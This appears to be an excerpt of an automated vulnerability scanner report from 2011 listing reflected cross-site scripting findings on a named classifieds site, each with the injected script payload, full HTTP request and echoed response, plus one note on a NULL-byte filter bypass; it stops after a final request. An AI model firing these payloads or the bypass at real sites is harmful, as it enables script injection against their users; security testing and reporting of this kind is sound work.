GET /saleca0c4"><script>alert(1)</script>f5884d558bf/ HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 14:59:03 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:59:03 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17667
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/saleca0c4"><script>alert(1)</script>f5884d558bf/?mobile=1" rel="nofollow"> ...[SNIP]...
1.174. http://classifieds.lycos.com/sale/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://classifieds.lycos.com
Path:
/sale/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a221b"><script>alert(1)</script>92058a17db1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sale/?a221b"><script>alert(1)</script>92058a17db1=1 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 14:58:16 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:58:16 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 47476
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/sale/?a221b"><script>alert(1)</script>92058a17db1=1&mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c521f"><script>alert(1)</script>dc92c066fef was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /service-carc521f"><script>alert(1)</script>dc92c066fef/ HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:52:52 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:52:52 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17688
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/service-carc521f"><script>alert(1)</script>dc92c066fef/?mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8ada"><script>alert(1)</script>12bcdb56ad8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /service-carc8ada"><script>alert(1)</script>12bcdb56ad8/ HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:20:27 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:20:27 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17688
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/service-carc8ada"><script>alert(1)</script>12bcdb56ad8/?mobile=1" rel="nofollow"> ...[SNIP]...
1.177. http://classifieds.lycos.com/service-car/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://classifieds.lycos.com
Path:
/service-car/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a67a"><script>alert(1)</script>494540086bc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /service-car/?2a67a"><script>alert(1)</script>494540086bc=1 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:20:05 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:20:05 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 38478
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/service-car/?2a67a"><script>alert(1)</script>494540086bc=1&mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24db4"><script>alert(1)</script>f6cca02a61f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /service-care24db4"><script>alert(1)</script>f6cca02a61f/ HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:19:02 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:19:02 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17691
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/service-care24db4"><script>alert(1)</script>f6cca02a61f/?mobile=1" rel="nofollow"> ...[SNIP]...
1.179. http://classifieds.lycos.com/service-care/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://classifieds.lycos.com
Path:
/service-care/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c519"><script>alert(1)</script>d96e3b9593b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /service-care/?4c519"><script>alert(1)</script>d96e3b9593b=1 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:18:14 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:18:14 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 36347
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/service-care/?4c519"><script>alert(1)</script>d96e3b9593b=1&mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78b35"><script>alert(1)</script>632d4fa0958 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /service-cleaning78b35"><script>alert(1)</script>632d4fa0958/ HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:16:31 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:16:31 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17703
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/service-cleaning78b35"><script>alert(1)</script>632d4fa0958/?mobile=1" rel="nofollow"> ...[SNIP]...
1.181. http://classifieds.lycos.com/service-cleaning/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://classifieds.lycos.com
Path:
/service-cleaning/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dedc9"><script>alert(1)</script>4c918edfa3e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /service-cleaning/?dedc9"><script>alert(1)</script>4c918edfa3e=1 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:16:02 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:16:02 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 39327
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/service-cleaning/?dedc9"><script>alert(1)</script>4c918edfa3e=1&mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b855"><script>alert(1)</script>9221725e733 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /service-coupon9b855"><script>alert(1)</script>9221725e733/ HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:20:27 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:20:27 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17697
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/service-coupon9b855"><script>alert(1)</script>9221725e733/?mobile=1" rel="nofollow"> ...[SNIP]...
1.183. http://classifieds.lycos.com/service-coupon/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://classifieds.lycos.com
Path:
/service-coupon/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d8a6"><script>alert(1)</script>6207b143050 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /service-coupon/?9d8a6"><script>alert(1)</script>6207b143050=1 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:20:09 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:20:09 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 34809
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/service-coupon/?9d8a6"><script>alert(1)</script>6207b143050=1&mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dabc4"><script>alert(1)</script>0ff54031af4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /service-creative-designdabc4"><script>alert(1)</script>0ff54031af4/ HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:53:39 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:53:39 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17724
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/service-creative-designdabc4"><script>alert(1)</script>0ff54031af4/?mobile=1" rel="nofollow"> ...[SNIP]...
1.185. http://classifieds.lycos.com/service-creative-design/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://classifieds.lycos.com
Path:
/service-creative-design/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff106"><script>alert(1)</script>ac1990bc01f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /service-creative-design/?ff106"><script>alert(1)</script>ac1990bc01f=1 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:53:32 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:53:32 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 31355
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/service-creative-design/?ff106"><script>alert(1)</script>ac1990bc01f=1&mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b57d4"><script>alert(1)</script>a02ae31ac68 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /service-education-tutorb57d4"><script>alert(1)</script>a02ae31ac68/ HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:53:51 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:53:51 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17724
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/service-education-tutorb57d4"><script>alert(1)</script>a02ae31ac68/?mobile=1" rel="nofollow"> ...[SNIP]...
1.187. http://classifieds.lycos.com/service-education-tutor/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://classifieds.lycos.com
Path:
/service-education-tutor/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31fb3"><script>alert(1)</script>50ca0473215 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /service-education-tutor/?31fb3"><script>alert(1)</script>50ca0473215=1 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:53:45 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:53:45 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 45535
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/service-education-tutor/?31fb3"><script>alert(1)</script>50ca0473215=1&mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e23a3"><script>alert(1)</script>da19991cd03 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /service-entertainment-cateringe23a3"><script>alert(1)</script>da19991cd03/ HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:19:04 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:19:04 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17745
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/service-entertainment-cateringe23a3"><script>alert(1)</script>da19991cd03/?mobile=1" rel="nofollow"> ...[SNIP]...
1.189. http://classifieds.lycos.com/service-entertainment-catering/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://classifieds.lycos.com
Path:
/service-entertainment-catering/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29655"><script>alert(1)</script>fa8ef175739 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /service-entertainment-catering/?29655"><script>alert(1)</script>fa8ef175739=1 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
